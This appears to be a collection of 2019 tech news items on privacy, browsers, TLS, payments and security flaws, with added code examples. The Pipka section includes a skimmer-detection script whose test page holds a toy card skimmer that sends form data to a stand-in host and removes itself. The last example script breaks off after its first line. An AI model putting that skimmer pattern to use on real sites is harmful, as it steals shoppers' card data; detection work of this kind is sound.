Mozilla has released its “Privacy Not Included” buyer's guide, a list of connected devices rated on how creepy they are and on whether they meet basic security standards.

While the guide is meant to warn holiday shoppers about what not to buy, it also helps identify which connected gadgets are trustworthy and protect their owners' privacy.

According to Mozilla, most of the smart home devices from Google, Amazon and Facebook pose some privacy risk. Amazon's Ring, for example, has been compromised in the past and collects location data via GPS, and it remains unclear whether users can delete the data the device accumulates.



Mozilla cited a similar issue with the Amazon Ring Indoor Cam, noting that stored customer data such as video recordings is not encrypted on Amazon's cloud servers and could be accessed by its employees. Along with some other Ring products, the camera was dinged for creepy privacy policies and because Amazon is not as transparent as Mozilla would like about its data retention and deletion policies.

In the guide, Mozilla reviewed a total of 76 gadgets available for purchase, across six categories: Smart Home, Toys & Games, Entertainment, Health & Exercise, Wearables and Pets.

Wearables are functional smart devices that can track your steps, monitor your heart rate, or even help you manage pain. It is important to note, though, that these devices also collect a great deal of data about you and your daily activities.



Mozilla also called out the Apple AirPods, stating that "they know when they're in your ear, when you take them out, when you're talking--Hey Siri!--and when you're listening. They connect to your iPhone and your Apple Watch at the same time, so you can...get confused about which device is playing? These earbuds sound almost too smart for their own good". Either they really are too smart, or they are as magical as Apple claims.

The guide scores the devices with an interactive tool that lets shoppers rate each product's creepiness on an emoji sliding scale from Not Creepy to Super Creepy.

Although Google Home met Mozilla's minimum security standards, users still rated it “super creepy” because Google targets users through their search history, location and many other data sources. Google's Nest Hub Max was rated “very creepy”, a notch below the Google Home.

Meanwhile, the Nintendo Switch and Sonos One SL were rated “not creepy”, having met Mozilla's privacy standards, while the three Apple products reviewed raised privacy concerns around the microphone, camera and location tracking that could let someone spy on users.

Mozilla releases #PrivacyNotIncluded List of Smart Speakers and Wireless devices



Intel has unveiled its oneAPI project, a unified programming model meant to simplify application development across systems that mix several processor architectures.

oneAPI is meant to make programming CPUs and accelerators easier using modern C++ features, expressing parallelism through a new language called Data Parallel C++ (DPC++).

It supports both direct and API-based programming, delivering a unified language and libraries for a native code experience across a range of hardware: CPUs, GPUs, FPGAs and even AI accelerators.

About Data Parallel C++ (DPC++)



Data Parallel C++ (DPC++) is a new, open, direct programming language intended as a cross-industry standard; it is based on C++ and incorporates SYCL.

Its most distinguishing feature is support for open, cross-vendor applications, being based on SYCL and C++, with Intel offering new analysis and debug tools and optimized libraries for various target domains.



DPC++ will allow developers to target CPUs, GPUs, FPGAs and other accelerators from a single source code base.

What the oneAPI initiative means for developers



Today's diverse data-centric workloads run on a range of architectures, each of which needs an efficient programming model to deliver performance; oneAPI aims to make programming CPUs and accelerators easier using modern C++ features.

It addresses diverse workloads with a programming model built for ease of use and performance, while eliminating the need to maintain separate code bases, multiple languages and divergent workflows.

oneAPI's libraries span several domains that benefit from workload acceleration, with library functions custom-coded for each target architecture.

Intel has promised enhanced analysis and debug tools for DPC++ across its range of SVMS (scalar, vector, matrix, spatial) architectures, with a developer beta and more details on the project due this fourth quarter.

Intel’s Unified Programming Model, oneAPI to cover diverse Architectures



Google has confirmed that it collects healthcare data, amid a controversy fueled by a Washington Post report that the NIH (National Institutes of Health) stopped the company from posting over 100,000 human x-rays.

A report credited to a whistle-blower revealed a program, dubbed Project Nightingale, in which Google works with Ascension, the Catholic health system holding over 50 million medical records from its healthcare providers, to collect private medical data on millions of Americans.

Google says it disclosed its plan to apply cloud data analytics to Ascension's patient information during its Q2 earnings call in July, though the name "Project Nightingale" was never mentioned on that call.

The x-rays were part of a 2017 joint project between Google and the NIH, but the agency discovered that the images contained personally identifiable information (PII) of patients.

Google has an agreement with Ascension that governs access to Protected Health Information (PHI) for the purpose of helping providers support patient care, but regardless of its legality, the collection of private medical data without individuals' consent has drawn criticism from patients and lawmakers, who have demanded a federal inquiry into the practice.

Many healthcare providers already store patient data in the cloud for analytics, on services such as Amazon Web Services, Google Cloud and Microsoft Azure. The current controversy, however, casts doubt on whether Google or any other tech company can be trusted with such sensitive information.

Notwithstanding, U.S. HIPAA rules have allowed a multi-billion-dollar market in anonymized patient data to develop in recent years, with many firms collecting and mining records on millions of patients.

Apple, too, collects data from its smartwatch users as part of a gynecological study with the NIH aimed at improving fertility and early disease detection.

Google confirms collecting Healthcare Data and Anonymizing it for research



Google has long been a staunch supporter of faster websites, through technologies such as Service Workers, where the company was a party to the draft specifying how Service Workers should be implemented in browsers.

A Service Worker acts as an in-browser proxy that lets a site script what happens between the browser and the network, in both directions, so that the site stays responsive and available even on a poor connection; it speeds up delivery of web content by cutting the back-and-forth between browser and server.
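To make the proxy idea concrete, the following service worker is an added example written for this page; it is not Google's code or code from the article. It intercepts the page's fetches and answers same-origin GET requests for static assets (assumed to live under /static/) from the Cache API, going to the network once on a miss, so repeat loads skip the round trip. The caveat a practitioner wants is built in: anything that is not a same-origin GET, carries an Authorization header, or comes back with Set-Cookie, Cache-Control: private or no-store is never cached, since a cached authenticated response would be replayed to whoever uses the browser profile next. The cache name and path prefix are assumptions, and the cache and fetch primitives are passed in so the logic can be exercised outside a browser.

```javascript
'use strict';

// Added example, not code from Google or the original article. Assumptions:
// static assets live under /static/ on the page's own origin, cache named "v1-static".
const ASSET_CACHE = 'v1-static';
const STATIC_PREFIX = '/static/';

// Decide whether a request may be answered from the cache.
// 'cache-first' only for same-origin GETs of static assets without credentials;
// everything else (POSTs, cross-origin, authenticated requests) is 'network-only'.
function cachePolicy(request, origin) {
  const url = new URL(request.url);
  if (request.method !== 'GET') return 'network-only';
  if (url.origin !== origin) return 'network-only';
  if (!url.pathname.startsWith(STATIC_PREFIX)) return 'network-only';
  // A cached authenticated response would leak to the next user of the profile.
  if (request.headers && typeof request.headers.get === 'function' &&
      request.headers.get('authorization')) return 'network-only';
  return 'cache-first';
}

// Only store responses that are safe to replay: successful, same-origin ("basic",
// not opaque), not marked private/no-store by the server, and not setting cookies.
function isCacheableResponse(response) {
  if (!response || !response.ok) return false;
  if (response.type && response.type !== 'basic') return false;
  const headers = response.headers;
  const cc = (headers && headers.get('cache-control')) || '';
  if (/\b(no-store|private)\b/i.test(cc)) return false;
  if (headers && headers.get('set-cookie')) return false;
  return true;
}

// The proxy step. `deps` supplies the browser primitives so the logic is testable:
//   cacheMatch(request) -> Promise<Response|undefined>
//   cachePut(request, response) -> Promise<void>
//   fetch(request) -> Promise<Response>
async function handleFetch(request, origin, deps) {
  if (cachePolicy(request, origin) === 'network-only') {
    return deps.fetch(request);
  }
  const cached = await deps.cacheMatch(request);
  if (cached) return cached;                    // cache hit: no network round trip
  const response = await deps.fetch(request);   // cache miss: one trip to the network
  if (isCacheableResponse(response)) {
    await deps.cachePut(request, response.clone());
  }
  return response;
}

// Wire the handler into the fetch event when actually running as a service worker.
if (typeof self !== 'undefined' && typeof self.addEventListener === 'function' &&
    typeof caches !== 'undefined') {
  self.addEventListener('fetch', (event) => {
    const deps = {
      cacheMatch: (req) => caches.open(ASSET_CACHE).then((c) => c.match(req)),
      cachePut: (req, res) => caches.open(ASSET_CACHE).then((c) => c.put(req, res)),
      fetch: (req) => fetch(req),
    };
    event.respondWith(handleFetch(event.request, self.location.origin, deps));
  });
}

if (typeof module !== 'undefined') {
  module.exports = { cachePolicy, isCacheableResponse, handleFetch, ASSET_CACHE, STATIC_PREFIX };
}
```

Register it from the page with navigator.serviceWorker.register('/sw.js'); the worker's scope is then the path it is served from, which is why it must sit at the site root (or a sub-path) rather than on a CDN origin.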

Now, Google is looking at a badge intended to identify sites that are coded in ways that make them slow, based on their historical load latency. It may later expand this to identify pages that are likely to be slow for a particular user given their device and network conditions.



Speed has been one of Chrome's core principles, and Google has continually worked to improve the experience of browsing the web. In a bid to help users recognize sites that are likely to load slowly, it plans to implement the badge; it already rewards websites that deliver fast experiences with higher search rankings.

Google will consider a number of Chrome surfaces for the badge, including the loading (splash) screen, the context menu for links and the loading progress bar. The link context menu could give users insight into a site's typical speed before they navigate to it.

Before the badge ships, Google promises to publish updates on the plan as it approaches release, though site owners need not wait to optimize. It points to resources such as PageSpeed Insights and Lighthouse, a lab tool, for learning where a site can improve and what options are available for speeding it up.

Chrome browser to Display Badge Identifying Websites that are typically slow



Microsoft's release of its digital assistant on third-party platforms was heralded as a great move to bring users into its ecosystem, but the company now plans to remove the Cortana app from Android and iOS devices on January 31, 2020.

Microsoft had earlier offered a glimpse of Cortana in the workplace, for use across its growing portfolio of productivity tools, and discontinuing the standalone app suggests the company wants to concentrate its effort on winning the enterprise.

According to the company, Cortana will be integrated into Microsoft 365, and the Android and iOS apps will be removed in select markets. At that point, content users created via the app, such as reminders and lists, will no longer function within the app or Microsoft Launcher, but will still be accessible on Windows.

Reminders, lists and tasks created via Cortana will be synced automatically to the Microsoft To Do app, which is a free download on Android and iOS.

Microsoft did not specify which regions the changes apply to, though the document detailing them was found on the Microsoft UK, Canada and Australia websites. It is not confirmed whether the Cortana app will remain available in the US.

Microsoft has planned new features for Cortana, including a summary of upcoming meetings and relevant documents, and a new Scheduler feature: by simply cc-ing Cortana on an email, a user can have it book a call or locate a meeting room, with a series of options presented based on availability.

The rollout of Cortana's integration into Microsoft 365 will begin on January 31, 2020, the same date the Cortana app is removed from Android and iOS.

Microsoft to restrict its digital assistant to the Windows platform



Pipka, a newly discovered web skimming script, removes itself from the host page after execution, which makes it much harder to detect by inspecting the page.

Visa's Payment Fraud Disruption (PFD) team discovered the script on the website of a North American merchant that had previously been infected with Inter, another widely used card skimmer. On further investigation the team found about 16 other merchant websites infected with Pipka.

Web payment skimming has become common lately with the rise of Magecart, whose shopping cart skimmers have hit over a dozen retailers. Even when running the same skimmer, these groups use different techniques to inject the malicious script into targeted sites.

What is Web Skimming?



Web skimming is the theft of card details from e-commerce sites through malicious scripts injected into the site. The scripts are placed on the retailer's checkout pages and capture card data as customers type it in to buy an item.

Notable skimming attacks include those waged by Magecart, an umbrella name for a dozen or so groups that have targeted the e-commerce sites of several major organizations, including Ticketmaster and British Airways, over the past 12 months.

In the Magecart cases, according to security researchers, the attackers re-injected the malicious script into retailers' checkout pages even after security teams had detected and removed it.

How is Pipka different from Magecart?



Unlike the common Magecart skimmers, Pipka is highly configurable: the attackers specify exactly which form fields to target. The stolen data is stored in encrypted form in a cookie and then exfiltrated to the attackers' command-and-control server.

The attackers can even target two-step checkout pages by configuring fields for both billing data and payment account data. Most notable, though, is its ability to cover its tracks by deleting itself from the web page after execution.

How to Protect Your e-Commerce site from Pipka



Website administrators are advised to add recurring checks in their e-commerce environments for communication with known skimmer command-and-control servers, to scan their websites regularly for malware, and to vet the content delivery networks and any other third-party code that partners load onto their pages.

Other measures include keeping shopping cart software up to date and patched, using strong passwords, limiting access to the administrative portal, and using an external checkout solution.
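The checks recommended above can be partly automated. The following is an added example, not Visa PFD's tooling or code from the article: given a snapshot of a checkout page's HTML, it lists every script, flags external scripts whose host is not on an allowlist or is on a blocklist of known skimmer C2 hosts, and flags inline scripts that show the traits described for Pipka, namely harvesting form fields, staging data in a cookie and removing their own script element. The sample page, the allowlist and the hostnames (reserved example.com and example.net names) are constructed for the example; the trait regexes are a heuristic starting point, not a signature for Pipka.

```javascript
'use strict';

// Added example (not Visa PFD code). Heuristic audit of a checkout page snapshot.

// Traits the article attributes to Pipka-style skimmers: harvesting form fields,
// staging the loot in a cookie, sending it out, and removing its own <script>
// element after running. An inline script is flagged when it shows the
// self-removal trait plus at least one of the others.
const TRAITS = {
  formHarvest: /(querySelectorAll|getElementsByTagName)\s*\(\s*['"](input|form)['"]/i,
  cookieStaging: /document\.cookie\s*=/i,
  selfRemoval: /(currentScript|parentNode)\s*\.\s*(remove|removeChild)\s*\(/i,
  exfil: /(new\s+Image\(\)|XMLHttpRequest|fetch\s*\()/i,
};

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_ATTR = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Extract scripts from an HTML snapshot. Regex parsing is adequate for auditing a
// page you control; use a real HTML parser if the input could be adversarial.
function extractScripts(html) {
  const out = [];
  let m;
  while ((m = SCRIPT_TAG.exec(html)) !== null) {
    const src = SRC_ATTR.exec(m[1]);
    out.push(src ? { kind: 'external', src: src[1] } : { kind: 'inline', body: m[2] });
  }
  return out;
}

function hostOf(src, pageOrigin) {
  try { return new URL(src, pageOrigin).hostname.toLowerCase(); } catch (e) { return null; }
}

// Audit one page. policy = { pageOrigin, allowedHosts, blockedHosts }.
// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditCheckoutPage(html, policy) {
  const allowed = new Set(policy.allowedHosts.map((h) => h.toLowerCase()));
  const blocked = new Set(policy.blockedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  extractScripts(html).forEach((script, index) => {
    if (script.kind === 'external') {
      const host = hostOf(script.src, policy.pageOrigin);
      if (host === null) {
        findings.push({ index, severity: 'high', reason: 'unparseable script src', src: script.src });
      } else if (blocked.has(host)) {
        findings.push({ index, severity: 'critical', reason: 'script loaded from known skimmer C2 host', host });
      } else if (!allowed.has(host)) {
        findings.push({ index, severity: 'medium', reason: 'script host not on allowlist', host });
      }
      return;
    }
    const hits = Object.keys(TRAITS).filter((t) => TRAITS[t].test(script.body));
    if (hits.includes('selfRemoval') && hits.length >= 2) {
      findings.push({ index, severity: 'high', reason: 'inline script with skimmer traits', traits: hits });
    }
  });
  return findings;
}

// Constructed sample: a checkout page with the shop's own script, an unexpected
// third-party script, and a toy inline script showing the traits above.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="payment"><input name="cc_number"><input name="cc_cvv"></form>
<script src="https://shop.example.com/js/checkout.js"></script>
<script src="https://static.example.net/tag.js"></script>
<script>
  var f = document.querySelectorAll('input');
  var s = ''; for (var i = 0; i < f.length; i++) s += f[i].name + '=' + f[i].value + '&';
  document.cookie = 'k=' + btoa(s);
  new Image().src = 'https://c2.example.net/i.gif?d=' + btoa(s);
  document.currentScript.parentNode.removeChild(document.currentScript);
</script>
</body></html>`;

const SAMPLE_POLICY = {
  pageOrigin: 'https://shop.example.com',
  allowedHosts: ['shop.example.com', 'cdn.example.com'],
  blockedHosts: [],   // feed this from your threat-intel list of known skimmer C2 hosts
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditCheckoutPage(SAMPLE_CHECKOUT_HTML, SAMPLE_POLICY), null, 2));
}

if (typeof module !== 'undefined') {
  module.exports = { extractScripts, auditCheckoutPage, SAMPLE_CHECKOUT_HTML, SAMPLE_POLICY, TRAITS };
}
```

Run this against a fresh fetch of the checkout page on a schedule and diff the findings against the last run; a script that is present in one snapshot and gone in the next is exactly the self-removing behaviour the article describes, so alert on disappearances as well as on new hosts.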

How newly discovered Web Skimming script, Pipka can run undetected



The proliferation of smartphones has had a massive impact on Nigeria's business environment, with several mobile payment platforms jostling for consumers' wallets. Whether paying utility bills or transferring funds to friends and family, there are many mobile apps for the job, and Nigerians are getting used to these mobile payment systems.

There are established players such as Interswitch, with its Quickteller platform, and Paga, but here we consider two newcomers that have shown great potential: PalmPay and OPay.

The entrance of these two mobile platforms is seen as a good opportunity for fintech startups, and perhaps as a major driver of the disruption expected in the banking sector.

About PalmPay



PalmPay is headquartered in the UK and offers a package of mobile financial services, including bill payments, rewards programs and discounted airtime purchases.



The company has just launched in the Nigerian market, having raised a $40 million seed round led by the Chinese smartphone maker Transsion Holdings. PalmPay was approved by the Central Bank of Nigeria (CBN) as a licensed mobile money operator in July 2019, and during its pilot phase registered about 100,000 users and processed 1 million transactions, according to a company spokesperson.

Its initial focus will be on mobile payments, though the sector has lately become crowded, with hundreds of startups already competing in Nigeria's fintech space to bring scalable mobile money solutions to the country's financial problems.

About OPay



OPay, an offshoot of Opera Group, owner of the renowned Opera Mini mobile browser, also targets unbanked Nigerians, and besides payments offers bike and tricycle hailing, quick loans and food delivery. It is something of a super app that seems to offer every service a Nigerian might require.



OPay grew out of Opera's 2017 acquisition of PayCom, and serves the company's vision of an open, connected Internet by building products that remove the barriers that keep people from getting online.

Opera already claims a large share of Africa's internet population: of the 464,923,169 web users in Africa, about 120 million use its mobile applications, the company says.

How OPay and PalmPay will Impact mobile payments in Nigeria



Both OPay and PalmPay have heavy backing from multinationals, so their financial muscle is not in doubt. PalmPay has a partnership with Visa that lets it deliver Visa products on top of customers' wallets, such as linking a wallet to Visa products, and gives completely unbanked users access to the whole Visa network.

OPay already has a plethora of customers from its other services, such as OFood, ORide and OTrike, and newer ones, such as OKash, OBus and OWealth, that are still gearing up for full operation. It clearly offers what people want, such as ride-hailing for Lagos commuters with government-approved bikes, buses and even tricycles, with insurance cover for both drivers and riders.

PalmPay, on the other hand, has strategic advantages that include Reeve's leadership experience in Africa, the support and network of Transsion (maker of Tecno, Infinix and Itel phones), and its partnership with Visa.

The battle lines are drawn for leadership of Nigeria's mobile money ecosystem, and the eventual leader may well be one of these two.

PalmPay vs OPay: Battle for Nigerians wallet by Money Apps and Reward Systems



Microsoft has combined Configuration Manager (ConfigMgr) with its Intune unified endpoint management (UEM) platform into a product now known as Microsoft Endpoint Manager, with everything accessible from a single interface.

ConfigMgr and Intune have played similar roles, as on-premises and cloud management tools respectively, with co-management options for provisioning and deploying secure endpoints and applications across the enterprise. With Endpoint Manager, Microsoft is converging the two to offer a seamless, end-to-end management solution without the complexity or the disruption to productivity.

Endpoint Manager is pitched as management and security that meets customers' particular needs, is available everywhere, and helps with their future migration to the cloud.

Microsoft Endpoint Manager also includes Desktop Analytics and the Device Management Admin Center (DMAC), along with simplified licensing: Intune licensing is being made available to ConfigMgr customers for co-managing their Windows devices.

Customers who wish to manage non-Windows devices with Microsoft Endpoint Manager will first need to purchase an Intune license, an EMS (Enterprise Mobility & Security) license, or a Microsoft 365 E3 or higher license, according to the company.

The rollout of Endpoint Manager and its features and capabilities will begin over the coming months for supported products.

Microsoft's unification of Configuration Manager (ConfigMgr) and UEM platform



Delegated Credentials for TLS is a new cryptographic mechanism, specified at the IETF, announced by Mozilla in conjunction with Cloudflare, Facebook and other members of the IETF community.

It limits the damage from a stolen key by reducing the validity period of the credential a server actually uses to a short window, days or even hours, instead of the months or years a certificate is valid for. It is a simpler way to get the effect of short-lived certificates without sacrificing the reliability of secure connections.

An HTTPS website presents its TLS certificate to the browser to prove its identity before any information, including passwords and other sensitive data, is exchanged. A certificate is expected to serve for its entire validity period, but it can go bad before its expiry date for several reasons.

The main reasons are that the private key corresponding to the certificate has been stolen, or that the certificate was issued fraudulently; either lets attackers impersonate the targeted server or spy on encrypted connections through a man-in-the-middle attack.

Over 70% of websites now use TLS certificates to establish HTTPS connections between server and visitor, which protects the privacy and integrity of the data exchanged; a TLS certificate must be obtained from a Certificate Authority (CA) trusted by all major browsers.

Major tech companies such as Google, Facebook and Cloudflare serve traffic from many servers scattered around the world, and distribute the certificate's private key to every one of them, which increases the risk of compromise.

If a certificate is compromised before it expires, the operator's only option is to ask the CA to revoke it and reissue a new one with a different private key.

But revocation is broken in practice. Browsers should be able to promptly detect a revoked certificate and refuse to connect to the compromised server until it obtains a new valid certificate, but that is not what happens.

Modern browsers either cache a certificate's validation for a while, or assume it is still valid when they get no valid response from the CA or hit a connection error (so-called soft-fail). To shrink this window, many web companies have started experimenting with certificates of shorter validity, after which the browser rejects them outright instead of waiting for a revocation signal.

The problem with this approach is that the CA is a separate organization from which the server would have to fetch new certificates ever more frequently, and there is no reliable way for companies to rotate certificates every few hours or days.

The IETF community set out to tackle this with Delegated Credentials for TLS, which balances the trade-off: instead of copying the certificate's actual private key to every server, a company keeps that key in one place and uses it to sign short-lived delegated credentials, each carrying a fresh key that it generates internally and deploys to its servers.

How the Delegated Credentials For TLS will boost TLS Protocol Security



Google has partnered with several mobile security companies in what it calls the ‘App Defense Alliance’, to help detect malicious apps targeting Android early.

For the first time, the Internet giant is seeking the help of third-party security companies to make Android more secure, by detecting potential threats in apps and improving security across the ecosystem.

Google has enlisted Zimperium, ESET and Lookout to form the App Defense Alliance, aiming to tackle one of Android's major problems: malicious apps that regularly reach users on the platform.

The initiative aims to ensure mobile users are better protected, with user safety paramount in the effort to stop malicious apps from reaching devices.



In a similar move, Microsoft has integrated third-party mobile threat defense systems with its Intune unified endpoint management (UEM) platform, enabling corporate customers to detect an unenrolled smartphone or tablet that is potentially infected with malware.

These moves help enterprises with BYOD (bring-your-own-device) policies, which can now block access to enterprise systems from devices flagged by the mobile threat defense software.

The App Defense Alliance takes a proactive approach to harmful apps, alongside the Google Play Protect service that scans installed apps on Android devices, to make doubly sure potentially harmful apps are detected before they are published on the Play Store.

As part of the alliance, Google will integrate its Play Protect detection system with the partners' scanning engines, so that multiple engines work to detect and block malicious apps before they reach the Play Store.

Microsoft already offers threat defense for enterprise PCs through Microsoft Defender, so extending it to Android and iOS devices is a natural evolution. Google's involvement of third-party security companies, for its part, shows it is serious about making the Android ecosystem more secure.

Google Enters ‘App Defense Alliance’ to help detect Malicious Android Apps



Microsoft had earlier offered a glimpse of Cortana in the workplace; now the company has fully targeted the virtual assistant at duties across its growing portfolio of productivity tools.

First, Microsoft brings a hands-free way to follow up on email: Cortana offers a summary of all new emails received in the past 24 hours, with an estimate of how long it will take to read them. Through integration with Outlook's Calendar, the assistant can also highlight changes to the calendar and potentially schedule events for the day.

Cortana can also tell you how long emails have been sitting in the inbox, who the sender is, and whether the email contains attachments, links or embedded files.

Gartner has predicted that over 25 percent of digital workers will use virtual assistants daily by 2021, which is an opportunity for SMBs to apply the technology to routine office processes, freeing time to attend to customers and reducing delays in communication.



Microsoft touts the Play My Emails feature as more like a conversation with a personal assistant than a basic text-to-speech readout of email. By saying “Hey, Cortana” a user can interrupt the readout to give commands (skip a message, flag it for later, archive it) or even dictate a reply using natural voice and language recognition.

Microsoft is well placed in the race for office assistant dominance, since it already has the most popular business apps in Office 365, with over 200 million monthly active users worldwide. It will still have to prove it can deliver on the promise of more natural conversations.

Microsoft has also added a masculine voice option for Cortana, accessible from the Outlook app's settings. A scheduler feature is currently in preview and is expected to be generally available next year.

Additional features coming soon include a daily briefing email summarizing upcoming meetings and relevant documents, and meeting setup with the new Scheduler feature: by simply cc-ing Cortana on an email, a user can ask the assistant to book a call or find a meeting room, and it will present a series of options based on availability.

Microsoft AI-powered voice assistant, Cortana makes further inroad into Workplace



Visual Studio Online, Microsoft's web-based version of its code editor, previously in private testing with select developers, has now been opened to the public.

The new online editor lets developers quickly configure a development environment for their repositories and work on their code. It provides cloud-powered development environments, suited to long-term projects as well as short-term tasks, in a browser-based editor accessible from anywhere.

Among other things, Visual Studio Online brings DevOps benefits such as reliability and scalability, which typically apply to production workloads, to development environments.



It not only allows environments to be customized per project, but also layers on individual personalization to make the cloud-hosted environments feel natural to use. Developers can keep using the tools, processes and configurations they already rely on, getting the best of both worlds.

Besides cloud-hosted environments, Visual Studio Online lets you register and connect your own self-hosted environment, one you have already tuned, and get some of the benefits of Visual Studio Online for free.

Each Visual Studio Online environment can be tailored to a specific project or task, either automatically through smart-configuration features or by fine-tuning it with JSON and Dockerfile configuration overrides.

These environments are quick to create, reproducible and reliable, which makes onboarding team members easy and lets you try out projects that would previously have been cumbersome to set up.

Reproducible development environments also practically eliminate the so-called "works on my machine" problem.

Microsoft releases the Online Version of the Code Editor, Visual Studio Online



Android Beam is a service that uses NFC (Near-Field Communication) to let Android devices send images, videos, other files and even apps to a nearby device, as an alternative to Wi-Fi and Bluetooth.

An app sent via NFC beaming should trigger a prompt on the receiving device asking permission to install from an unknown source, but on Android 8 (Oreo) and above no such prompt appears, and the app installs with a single tap.

Android normally displays a warning whenever a user tries to install an app that did not come from the Play Store; the bug is that on Oreo and later, NFC beaming does not ask whether the user wants to allow installation from an unknown source.



The reason is that certain apps, such as Dropbox and Google Chrome, are whitelisted as trusted install sources, so apps they hand off install without the security warning, and the NFC beaming service fell under the same whitelist.

The bug matters because new Android devices ship with NFC enabled by default and give little indication that it is active. NFC works when two devices are held within about 4 cm (1.5 inches) of each other, so an attacker wanting to push malware to your device only needs to bring their phone close to yours.

Google acknowledged the bug (CVE-2019-2114) as affecting devices running Android 8.0 (Oreo) or above, in that anyone, including bad actors, could discreetly deliver malware to a phone via NFC beaming.

The company has released a fix that removes NFC beaming from the whitelist. Users are advised to install the latest Android update available for their device, and to turn off NFC and Android Beam on the device in the meantime.

How To Protect Your Android Smartphone from the NFC beaming bug



Google has issued a warning to Chrome users to urgently upgrade their browser, with Chrome 78.0.3904.87 release, containing a patch for two highly severe vulnerabilities, one of which is already been actively exploited in the wild by attackers to hijack PCs.

According to the Chrome security team, both issues are use-after-free vulnerabilities, the first in Chrome's audio component (CVE-2019-13720) and the second in the PDFium library (CVE-2019-13721); both affect Chrome for Windows, Mac and Linux.

A use-after-free is a class of memory-corruption bug in which a program keeps using memory after it has been freed, so an attacker who controls what gets placed in that memory can corrupt data or hijack control flow. Both flaws could allow a remote attacker to run arbitrary code in the context of the browser on the affected system by convincing the targeted user to visit a maliciously crafted website.

The discovery of the flaws was credited to Kaspersky researchers Anton Ivanov and Alexey Kulaev. The audio-component bug is already being exploited in the wild, though it is not yet clear which specific group is behind the attacks.

Kaspersky traced the exploit to a compromised Korean-language news portal. After exploiting the Chrome vulnerability (CVE-2019-13720), the attackers installed first-stage malware on the target system, which then connected to a remote command-and-control server to download the final payload.

Google also released security patches for Chrome to fix other use-after-free vulnerabilities in different components of the browser, the most severe of which could let remote attackers take control of an affected system.

Chrome users are advised to update the software on their systems and, whenever possible, to run the browser as a non-privileged user to limit the damage from any attack exploiting the zero-day. Chrome normally updates itself and notifies users when a new version is available, but users can trigger the update immediately from the menu: Help → About Google Chrome.
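Checking one browser through Help → About is fine for a single machine; for a fleet you want the version compared against the fixed build automatically. The script below is an added example, not code from the original article or from Google: it compares a four-part Chrome version string against 78.0.3904.87 (the fixed release named above), flags anything older as still carrying CVE-2019-13720 and CVE-2019-13721, and can read the version from a locally installed Linux Chrome or Chromium. The binary names it probes and the sample inventory are assumptions for the example.

```shell
#!/bin/sh
# Added example (not the article's or Google's code): flag a Chrome build as
# still carrying CVE-2019-13720 / CVE-2019-13721 by comparing its version
# against the release that shipped the fix, 78.0.3904.87 (from the article).
FIXED_VERSION="78.0.3904.87"

# version_lt A B: returns 0 when dotted version A is numerically below B.
# Chrome versions have four numeric components (major.minor.build.patch);
# a missing component is treated as 0, so "79" compares like "79.0.0.0".
version_lt() {
    a="$1"; b="$2"
    for i in 1 2 3 4; do
        x="$(printf '%s' "$a" | cut -d. -f"$i")"
        y="$(printf '%s' "$b" | cut -d. -f"$i")"
        x="${x:-0}"; y="${y:-0}"
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
    done
    return 1   # equal: not lower
}

# chrome_vulnerable <version>: 0 if the build predates the fix, 1 otherwise.
chrome_vulnerable() {
    version_lt "$1" "$FIXED_VERSION"
}

# installed_chrome_version: prints the version of a locally installed
# Chrome/Chromium, or nothing. Assumes the Linux binary names; macOS keeps
# the binary inside Google Chrome.app and is not handled here.
installed_chrome_version() {
    for bin in google-chrome google-chrome-stable chromium chromium-browser; do
        if command -v "$bin" >/dev/null 2>&1; then
            # Output looks like "Google Chrome 78.0.3904.87"; keep the number.
            "$bin" --version 2>/dev/null | grep -o '[0-9][0-9.]*[0-9]' | head -n 1
            return 0
        fi
    done
    return 1
}

# Constructed inventory (hostname and reported version, not real data):
for entry in "build-01 78.0.3904.70" "dev-07 78.0.3904.87" "qa-03 77.0.3865.120"; do
    host="${entry%% *}"
    ver="${entry#* }"
    if chrome_vulnerable "$ver"; then
        echo "$host: Chrome $ver is older than $FIXED_VERSION: update now"
    else
        echo "$host: Chrome $ver is patched"
    fi
done

# Live check of this machine, if a Linux Chrome/Chromium is installed.
if local_ver="$(installed_chrome_version)" && [ -n "$local_ver" ]; then
    if chrome_vulnerable "$local_ver"; then
        echo "this host: Chrome $local_ver is vulnerable"
    else
        echo "this host: Chrome $local_ver is patched"
    fi
fi
```

Only the fourth component differs between the vulnerable 78.0.3904.70 and the fixed 78.0.3904.87, so a check that compares major versions alone would miss it; that is why the comparison walks all four components.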

Warnings: Two Chrome vulnerabilities actively Exploited in the wild to hijack PCs



Google has touted Site Isolation in Chrome 77 on desktop as capable of defending against significantly stronger attacks, including scenarios where the renderer process itself is compromised, for example through Universal Cross-Site Scripting (UXSS) logic errors.

The mechanism initially targeted Spectre-like attacks, which leak data from within a given renderer process. Starting with Chrome 77, Site Isolation also addresses the more severe case where the renderer process is completely compromised through a security bug, such as a memory-corruption bug or a UXSS logic error.

In other words, Google has extended the defence to cover attacks that exploit vulnerabilities in the browser's rendering engine, Blink.

Site Isolation works by limiting each Blink renderer process to pages from a single site, so a rendered page is kept apart from pages of other sites. When a malicious site exploits a vulnerability, it is denied access to other sites' data, so the attacker cannot read the user's data from those sites, such as corporate information.

A bug may still let an attacker run arbitrary native code inside the sandboxed renderer process: once an attacker has exploited a memory-corruption bug in Chrome's rendering engine, the security checks in Blink no longer constrain them.

But Chrome's browser process knows which site each renderer is handling, so it withholds cookies, passwords and other site data belonging to other sites from that process, making it far more difficult for attackers to steal cross-site data.

Chrome 77 also brings Site Isolation to Android, where previous versions did not enable it (it had been desktop-only). On desktop, isolation is turned on for all sites; on Android it is applied per site, and only for sites that handle sensitive data.

The Android rollout starts with Chrome 77 and is enabled for about 99% of users on devices with at least 2 GB of RAM, with a 1% holdback to monitor performance.
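The defence described above only holds while Site Isolation is actually on, and it is routinely switched off by test automation and by people chasing memory usage. The script below is an added example, not code from the original article or from Chromium: it renders the managed-policy file that pins full site isolation on desktop Chrome (the `SitePerProcess` and `IsolateOrigins` policies), and it detects a Chrome process launched with one of the switches that disable isolation (`--disable-site-isolation-trials`, or `--disable-features=` naming `site-per-process` or `IsolateOrigins`). The Linux policy path, the example origins and the sample command lines are assumptions for the example.

```shell
#!/bin/sh
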